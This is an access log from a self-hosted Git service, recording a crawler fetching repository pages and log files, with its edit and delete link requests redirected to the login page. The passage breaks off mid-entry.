"/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 10081] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 20090] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 1452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=source" [Client 216.73.216.188] [Length 14731] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/css/style.css" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.2" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" -[15/Feb/2026:13:23:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.2" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/css/style.css" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9968] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" -[15/Feb/2026:13:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11057] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" -[15/Feb/2026:13:23:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" -[15/Feb/2026:13:23:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" -[15/Feb/2026:13:23:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" -[15/Feb/2026:13:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12154] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 10076] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13429] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 